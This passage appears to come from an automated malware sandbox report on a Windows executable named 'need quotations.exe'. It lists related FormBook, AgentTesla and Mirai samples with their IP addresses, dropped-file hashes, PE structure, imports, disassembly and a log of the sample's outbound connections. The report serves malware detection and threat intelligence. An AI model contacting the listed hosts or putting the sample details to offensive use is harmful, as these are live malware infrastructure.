	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	RFQ.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
INTERNET-CZKtis238403KtisCZ	UNGSno5k4G.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	81.2.194.241
	rHSBCBank_Paymentswiftcpy.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	NU1aAbSmCr.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	lPX6PixV4t.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	POPO00003964.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	81.2.196.19
XIRRADE	file.exe	Get hash	malicious	SystemBC	Browse	185.169.24.192
	Zam#U00f3wienie Z2300056_pdf .scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.169.24.118
	New order -24900242 OP_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.169.24.118
	vAZYIEQMP8.elf	Get hash	malicious	Mirai, Moobot	Browse	195.138.242.157
	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	130.185.109.77
	Product24573.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	Siirtokuitti_006703.exe	Get hash	malicious	FormBook, GuLoader	Browse	130.185.109.77
	P5348574_74676.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	Product7825.exe	Get hash	malicious	FormBook	Browse	130.185.109.77
	535276_86376.exe	Get hash	malicious	FormBook	Browse	130.185.109.77

Process:	C:\Windows\SysWOW64\rasdial.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autEBE3.tmp

Download File

Process:	C:\Users\user\Desktop\need quotations.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992771067588891
Encrypted:	true
SSDEEP:	6144:ZWhSWEGhZET1hM+nKSd0ZdJZ3/1j2E/ZkPFAQZ1ZiU5ixGIZP+1R:ZcSh0U1K+0Zt15/ZUCQdljIZPW
MD5:	5CE8B0929DC268B24A0FA11D68EA5749
SHA1:	5A2317186D0D2BD103A31969EE69F3DED0FF0057
SHA-256:	406B381696D6E56A0DD7F0BE3239F775AECB9BE0E6C58E9F93B382E9193123DF
SHA-512:	A75B3393290675D7BB03B3B595E0467A9F169F31803E16028F9F8D5E8EE51386F01737015E918D00C1A292D3BD12FE128B79E47B14E7E0293EFEA493AC7518C4
Malicious:	false
Reputation:	low
Preview:	...OMNN2MKRY.D3.NNN2IKR.0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2.KRY>W.=O.G...J....,Z<n><].934.+%]!!:nP,k ,^h-]o....$$6<.EI9kNNN2IKR 1A../).sR..o9W.^..t.U.Q...t$T.T...u+5.b!'[r.).2IKRY0HDc.NN.3HK./.D3ONNN2I.R[1CE8ON.J2IKRY0HD3/ZNN2YKRY@LD3O.NN"IKR[0HB3ONNN2IMRY0HD3ON>J2IIRY0HD3MN..2I[RY HD3O^NN"IKRY0HT3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3a:+6FIKR]cLD3_NNNfMKRI0HD3ONNN2IKRY0hD3/NNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY

C:\Users\user\AppData\Local\Temp\immortaliser

Download File

Process:	C:\Users\user\Desktop\need quotations.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992771067588891
Encrypted:	true
SSDEEP:	6144:ZWhSWEGhZET1hM+nKSd0ZdJZ3/1j2E/ZkPFAQZ1ZiU5ixGIZP+1R:ZcSh0U1K+0Zt15/ZUCQdljIZPW
MD5:	5CE8B0929DC268B24A0FA11D68EA5749
SHA1:	5A2317186D0D2BD103A31969EE69F3DED0FF0057
SHA-256:	406B381696D6E56A0DD7F0BE3239F775AECB9BE0E6C58E9F93B382E9193123DF
SHA-512:	A75B3393290675D7BB03B3B595E0467A9F169F31803E16028F9F8D5E8EE51386F01737015E918D00C1A292D3BD12FE128B79E47B14E7E0293EFEA493AC7518C4
Malicious:	false
Reputation:	low
Preview:	...OMNN2MKRY.D3.NNN2IKR.0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2.KRY>W.=O.G...J....,Z<n><].934.+%]!!:nP,k ,^h-]o....$$6<.EI9kNNN2IKR 1A../).sR..o9W.^..t.U.Q...t$T.T...u+5.b!'[r.).2IKRY0HDc.NN.3HK./.D3ONNN2I.R[1CE8ON.J2IKRY0HD3/ZNN2YKRY@LD3O.NN"IKR[0HB3ONNN2IMRY0HD3ON>J2IIRY0HD3MN..2I[RY HD3O^NN"IKRY0HT3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3a:+6FIKR]cLD3_NNNfMKRI0HD3ONNN2IKRY0hD3/NNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY0HD3ONNN2IKRY

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.148029671224187
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	need quotations.exe
File size:	1'214'976 bytes
MD5:	2b4391106cb993ad3fa94fff2d39c70c
SHA1:	cc46179bcd3b71e6ee6a08d64cb2c1110cb08535
SHA256:	45a9ab6797cc7d6ea37308be07621d172f52d59d82ab5bb10adba5ca4c598a46
SHA512:	93e196b7214d8a605d95d884f6200affcdd8ae909e81aeec6bf0505799c448949624ddf25a9b0286e433febd81487f4b2b9c92d61c809a41c8ba15b74f77a944
SSDEEP:	24576:Ytb20pkaCqT5TBWgNQ7auxfOdknzcWCd/Xd106A:hVg5tQ7aux2dknzcWCdPdi5
TLSH:	7D45C01373DD8361C3B25273BA257741BEBB782506A1F96B2FD8093DE920122525EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673D3847 [Wed Nov 20 01:15:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F7F2CEF544Fh
jmp 00007F7F2CEE8464h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F7F2CEE85EAh
cmp edi, eax
jc 00007F7F2CEE894Eh
bt dword ptr [004C0158h], 01h
jnc 00007F7F2CEE85E9h
rep movsb
jmp 00007F7F2CEE88FCh
cmp ecx, 00000080h
jc 00007F7F2CEE87B4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F7F2CEE85F0h
bt dword ptr [004BA370h], 01h
jc 00007F7F2CEE8AC0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F7F2CEE878Dh
test edi, 00000003h
jne 00007F7F2CEE879Eh
test esi, 00000003h
jne 00007F7F2CEE877Dh
bt edi, 02h
jnc 00007F7F2CEE85EFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F7F2CEE85F3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F7F2CEE8645h
bt esi, 03h
jnc 00007F7F2CEE8698h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5f92c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x124000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5f92c	0x5fa00	cf5e32b7fc2ae05b56fd905acbc77cd7	False	0.9311989379084967	data	7.9022741158192815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x124000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x56c33	data			1.0003264120840005
RT_GROUP_ICON	0x1233ec	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x123464	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x123478	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12348c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1234a0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12357c	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 04:18:42.885910988 CET	49736	80	192.168.2.4	23.167.152.41
Nov 20, 2024 04:18:42.891022921 CET	80	49736	23.167.152.41	192.168.2.4
Nov 20, 2024 04:18:42.891128063 CET	49736	80	192.168.2.4	23.167.152.41
Nov 20, 2024 04:18:42.914311886 CET	49736	80	192.168.2.4	23.167.152.41
Nov 20, 2024 04:18:42.919234037 CET	80	49736	23.167.152.41	192.168.2.4
Nov 20, 2024 04:18:43.256261110 CET	80	49736	23.167.152.41	192.168.2.4
Nov 20, 2024 04:18:43.256616116 CET	49736	80	192.168.2.4	23.167.152.41
Nov 20, 2024 04:18:43.265392065 CET	49736	80	192.168.2.4	23.167.152.41
Nov 20, 2024 04:18:43.270273924 CET	80	49736	23.167.152.41	192.168.2.4
Nov 20, 2024 04:18:59.978928089 CET	64569	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:18:59.983891010 CET	80	64569	199.59.243.227	192.168.2.4
Nov 20, 2024 04:18:59.983980894 CET	64569	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:18:59.998682976 CET	64569	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:00.004503965 CET	80	64569	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:00.469674110 CET	80	64569	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:00.469716072 CET	80	64569	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:00.469772100 CET	80	64569	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:00.469897985 CET	64569	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:00.469897985 CET	64569	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:01.501558065 CET	64569	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:02.519788027 CET	64585	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:02.524787903 CET	80	64585	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:02.524883032 CET	64585	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:02.537687063 CET	64585	80	192.168.2.4	199.59.243.227
Nov 20, 2024 04:19:02.542588949 CET	80	64585	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:02.980175018 CET	80	64585	199.59.243.227	192.168.2.4
Nov 20, 2024 04:19:02.980204105 CET	80	64585	199.59.243.227	192.168.2.4
